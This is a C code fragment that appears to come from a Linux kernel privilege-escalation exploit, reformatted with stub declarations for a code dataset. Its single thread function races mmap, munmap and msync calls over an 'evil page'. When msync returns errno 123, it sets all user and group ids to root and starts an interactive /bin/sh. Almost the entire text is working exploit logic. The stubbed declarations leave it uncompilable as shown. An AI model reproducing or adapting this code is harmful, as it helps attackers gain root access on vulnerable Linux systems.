
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int MAP_ANONYMOUS ;
 int MAP_FIXED ;
 int MAP_PRIVATE ;
 int MAP_SHARED ;
 int MS_SYNC ;
 int PAGE_SIZE ;
 int PROT_EXEC ;
 int PROT_READ ;
 int PROT_WRITE ;
 int VMAFILL ;
 int _exit (int ) ;
 int cleanup () ;
 int errno ;
 int execl (char*,char*,char*,int *) ;
 int fd3 ;
 int killall () ;
 int mmap (char*,int,int,int,int ,int ) ;
 int msync (char*,int,int ) ;
 int munmap (char*,int) ;
 int printf (char*,...) ;
 scalar_t__ sem ;
 int sendsig (int) ;
 int setresgid (int ,int ,int ) ;
 int setresuid (int ,int ,int ) ;
 char* swapmem ;
 int usleep (int) ;
 char* vmamem ;
 int wait4sig () ;

__attribute__((used)) static int thread(void *d)
{
int t3;
int ret;
int i;

wait4sig();
printf("(sleep1)\n");
usleep(300000);
printf("(sleep1 finished)\n");
printf("trying to mmap back the evil page\n");
for (i = 0; i < VMAFILL; i++) {
if (i == VMAFILL/2)
ret=mmap(swapmem + PAGE_SIZE * 2, PAGE_SIZE, PROT_READ|PROT_WRITE,MAP_SHARED|MAP_FIXED, fd3, 0);
mmap(vmamem + i * PAGE_SIZE, PAGE_SIZE, PROT_READ|((i&1)?(PROT_WRITE):(PROT_EXEC)),
MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
}
swapmem[PAGE_SIZE*2] = 'x';
printf("%p, evil mapped\n",ret);
printf("(sleep2)\n");
if (sem)
cleanup();
sendsig(t3);
usleep(300000);
printf("(sleep2 finished)\n");
if (sem)
cleanup();
munmap(vmamem, VMAFILL * PAGE_SIZE);
printf("doing msync\n");
printf("still doing msync\n");
ret = msync(swapmem + PAGE_SIZE * 2, PAGE_SIZE * 4, MS_SYNC);
printf("finished msync, %d, errno=%d\n", ret, errno);
if (ret == -1 && errno == 123) {
sem = 0;
killall();
printf("y4'r3 1uCky k1d!\n");
setresuid(0, 0, 0);
setresgid(0, 0, 0);
execl("/bin/sh", "sh", "-i", ((void*)0));
printf("execve failed %d\n", errno);
}
if (!sem) {
printf(":(\n");
cleanup();
}
_exit(0);
}
